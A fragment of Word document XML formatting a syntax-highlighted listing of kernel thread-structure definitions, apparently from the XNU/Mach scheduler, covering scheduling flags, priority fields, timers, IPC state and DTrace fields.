          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TH_SFLAG_THROTTLE_DEMOTED </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_SFLAG_FAILSAFE </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_SFLAG_FAIRSHARE_TRIPPED</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_mode contains previous sched_mod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lastRenderedPageBreak/>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_SFLAG_PROMOTED       </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0008</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 pri has been promot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ABORT          </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x001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bort interruptible wait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ABORTSAFELY        </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x002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 but only those at safe poin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ABORTED_MASK       </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TH_SFLAG_ABORT </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_SFLAG_ABORTSAFELY</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DEPRESS        </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x004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normal depress yiel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POLLDEPRESS        </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x008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olled depress yiel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DEPRESSED_MASK     </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TH_SFLAG_DEPRESS </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_SFLAG_POLLDEPRES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PRI_UPDATE     </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x010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Updating priorit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EAGERPREEMPT       </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x020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ny preemption of this thread should be treated as if AST_URGENT appli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RW_PROMOTED        </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x040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 pri has been promoted due to blocking with RW lock hel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PROMOTED_MASK      </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TH_SFLAG_PROMOTED </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_SFLAG_RW_PROMOTE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THROTTLE_DEMOTED   </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x080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ottled thread forced to timeshare mode (may be applied in addition to failsaf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SFLAG_RW_PROMOTED_BIT    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10</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0x400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sched_pri</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heduled (current) priorit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priority</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base priorit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max_priority</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py of max base priorit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task_priority</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py of task base priority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defined</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIG_SCHED_GRR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w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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16_t            grrr_defici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fixed point (1/1000th quantum) fractional defici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lastRenderedPageBreak/>
        <w:t>#endif</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promotion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level of promo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pending_promoter_index</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ref_cou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number of references to m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pending_promoter</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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rwlock_cou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Number of lck_rw_t locks held by thread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MACH_ASSER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SHARE_COUNT</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BG_COU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is thread's contribution to global sched counters (temporary debugging)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ACH_ASSERT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importanc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ask-relative importanc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riority depression expir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depress_timer_activ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imer_call_data_t   depress_tim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al-time parameter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ee mach/thread_policy.h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perio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computation</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uint32_t            constrai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boolean_t           preemptibl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deadlin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realtim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was_promoted_on_wakeup</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last_run_tim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ime when thread was switched away from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quantum_remaining</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uration of current quantum remaining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defined</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIG_SCHED_MULTIQ</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ched_group_t           sched_group</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efined(CONFIG_SCHED_MULTIQ)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ata used during setrun/dispatch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imer_data_t        system_tim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ystem mode tim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processor_t         bound_processo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bound to a processo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processor_t         last_processo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rocessor last dispatched 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processor_t         chosen_processo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here we want to run this thread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Fail-safe computation since last unblock or qualifying yiel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computation_metere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computation_epoch</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safe_releas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when to release fail-saf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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* Call out from schedul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sched_call</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typ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hread_t    threa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defined</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIG_SCHED_PROTO</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runqueue_generation</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last time runqueue was drain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tatistics and timesharing calculation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defined</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIG_SCHED_TIMESHARE_COR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sched_stamp</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last scheduler ti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sched_usag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imesharing cpu usage [sch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pri_shif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usage -&gt; priority from pse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cpu_usag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instrumented cpu usage [%cpu]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cpu_delta</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ccumulated cpu_usage delta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NFIG_SCHED_TIMESHARE_COR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c_switch</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otal context switch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p_switch</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otal processor switch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ps_switch</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otal pset switches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iming data structur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precise_user_kernel_tim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recise user/kernel enabled for this thre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imer_data_t        user_tim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user mode tim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uint64_t            user_timer_sav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 user timer valu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system_timer_sav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 system timer valu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vtimer_user_sav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 values for vtimer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vtimer_prof_sav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vtimer_rlim_sav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iming for wait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wait_sfi_begin_tim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tart time for thread waiting in SFI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imed wait expir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imer_call_data_t   wait_tim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wait_timer_activ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boolean_t           wait_timer_is_se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Processor/cache affinity</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 affinity_threads links task threads with the same affinity se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affinity_set_t          affinity_se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queue_chain_t           affinity_thread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Various bits of stashed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union</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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return_t   stat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ceive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port_seqno_t   seqno</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eqno of recvd messag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pc_object_t        objec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object received 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vm_address_t   msg_add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ceive buffer point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size_t     msiz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ax size for recvd msg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option_t   option</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options for receiv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size_t     slist_siz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catter list siz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port_name_t    receiver_nam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e receive port nam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ipc_kmsg     </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmsg</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ceived messag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continue_t continuation</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receiv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semaphore    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>waitsemaphor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emaphore ref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semaphore    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>signalsemaphor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emaphore ref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option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emaphore option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kern_return_t       resul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rimary resul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msg_continue_t continuation</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sema</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option</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witch op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boolean_t               reenable_workq_callback</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on entry, callbacks were suspend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swtch</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misc</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atch-all for other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save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tructure to save information about guard excep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unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                typ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EXC_GUARD reason/typ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exception_data_type_t      cod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Exception cod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exception_data_type_t      subcod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Exception sub-cod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guard_exc_info</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IPC data structur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IMPORTANCE_INHERITANCE</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natural_t ith_assertion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ssertions pending dro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ipc_kmsg_queue ith_message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essages to rea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port_t ith_rpc_reply</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ply port for kernel RPCs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st/Halt data structur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vm_offset_t                 recov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age fault recover(copyin/out)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queue_chain_t               thread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global list of all threads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ctiv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queue_chain_t           task_thread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achine-dependent stat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machine_thread   machin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ask membership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ask             </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>task</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vm_map_t                map</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decl_lck_mtx_data</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mutex</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ending thread ast(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ast_t                   as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Miscellaneous bits guarded by mutex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active</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is active and has not been terminat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tarted</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has been started after creation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static_param</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isallow policy parameter chang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policy_reset</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isallow policy parameter changes on terminating thread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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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Return Hander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ReturnHandler </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ReturnHandler    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nex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handl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ReturnHandler        </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rh</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hread               </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>threa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handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> special_handl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orts associated with this thre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ipc_port         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ith_self</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not a right, doesn't hold ref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ipc_port         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ith_sself</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 send righ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exception_action </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exc_action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def</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  MACH_BSD</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uthread</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CONFIG_DTRACE</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_dtrace_flag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DTrace thread state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_DTRACE_EXECSUCCESS   </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x01</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_dtrace_predcache</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* DTrace per thread predicate value hint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64_t t_dtrace_tracing</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time under dtrace_prob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64_t t_dtrace_vtim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clock_sec_t t_page_creation_tim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uint32_t    t_page_creation_cou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CHUD_MARKED           </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x01</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is thread is marked by CHU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IN_CHUD               </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x02</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is thread is already in a CHUD handl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HREAD_PMC_FLAG         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x04</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Bit in "t_chud" signifying PMC interest */</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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AST_CALLSTACK         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x08</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scheduled to dump a</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callstack on its nex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 AST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AST_NAME              </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x1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scheduled to dump</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                           * its name on its nex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 AST */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C0456" w:rsidRPr="004C0456" w:rsidRDefault="004C0456" w:rsidP="004C0456">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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NAME_DONE             </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x2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has previously</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                           * recorded its nam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define</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
